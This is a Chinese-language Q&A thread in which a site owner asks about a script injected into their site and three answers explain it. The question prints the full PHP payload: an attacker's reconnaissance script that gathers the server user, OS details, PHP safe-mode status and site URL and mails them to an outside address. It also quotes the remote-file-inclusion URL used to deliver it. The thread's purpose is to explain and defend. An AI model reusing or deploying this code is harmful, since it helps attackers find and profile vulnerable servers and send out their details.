Question

有人在这里试图用一些脚本充斥我的网站。幸运的是我的应用程序抓住了它。

我只是想知道这段代码在做什么，

<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . " 

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>

他试图做这样的事情：mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?。

Answer 1

http://evilcodecave.blogspot.com/2009/08/rfi-malware-analysis-ascrimez-kit.html

这是一个通知脚本，即用于...发送通知邮件攻击者，发现更加脆弱服务器：）

Answer 2

看起来这个脚本只收集并向inbox200905@hotmail.com地址发送一些信息：

在服务器上执行php脚本的用户的名称
安装在服务器上的操作系统名称
启用php safe mode
还有其网址和脚本名称

我认为此脚本仅用于查找可用于攻击的服务器。

Answer 3

编辑：正如Greg Hewgill在评论中指出的那样，这个有可能运行的事实，即使没有任何有用的报告，也是一个不应该关注的问题。轻描淡写。

看起来它正试图收获“$ SafeMode”统计数据，以便将来可能的漏洞使用：

...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . "     // is PHP safe mode off? on? what?
http://" . $delet . "                    // full request URI
...
$email = "inbox200905@hotmail.com";      // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail

Dolt未能将他抬起的用户邮寄回来。弱酱。

脚本小子用这个片段充斥我的网站

3 个答案: